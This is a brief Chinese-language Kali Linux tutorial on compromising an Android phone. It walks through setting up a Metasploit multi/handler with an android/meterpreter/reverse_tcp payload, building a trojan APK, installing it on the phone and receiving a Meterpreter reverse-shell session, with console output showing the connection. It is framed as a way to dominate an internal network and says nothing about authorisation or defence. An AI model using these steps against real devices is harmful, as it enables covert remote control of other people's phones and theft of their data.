kali攻防第2章 内网称霸之渗透安卓系统

Kali内网称霸之渗透安卓系统

准备工具

1、准备一部实体android手机

2、使用KALI系统

要用到强大的msf工具（metasplot）

流程步骤

1、启动msf命令是msfconsole

2、在安卓手机上安装一个自己生成的apk木马程序

3、利用msf工具来远程连接Android系统

1）启动msf（注意这里是链接msf就行了不需要进入数据库）



选择相应的模块

msf > use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 10.10.10.131

LHOST => 10.10.10.131

msf exploit(handler) > set LPORT 55555

LPORT => 55555

2）生成apk木马程序



LHOST的意思是 ：本机的IP

LPORT的意思是：使用的端口号

后面的命令就是输入apk文件到桌面

3) 模块的IP和端口号都和安卓木马的IP和端口一样

4)上传test.apk到手机中

5)执行

[*] Started reverse handler on 10.10.10.131:55555

[*] Starting the payload handler...

[*] Sending stage (43586 bytes) to 192.168.1.106

[*] Meterpreter session 1 opened (10.10.10.131:55555 -> 192.168.1.106:48308) at 2015-11-24 16:24:34 +0800

Computer : localhost

OS : Android 4.3 - Linux 3.0.31-2185275 (armv7l)

Meterpreter : java/android

看到这个说明成功了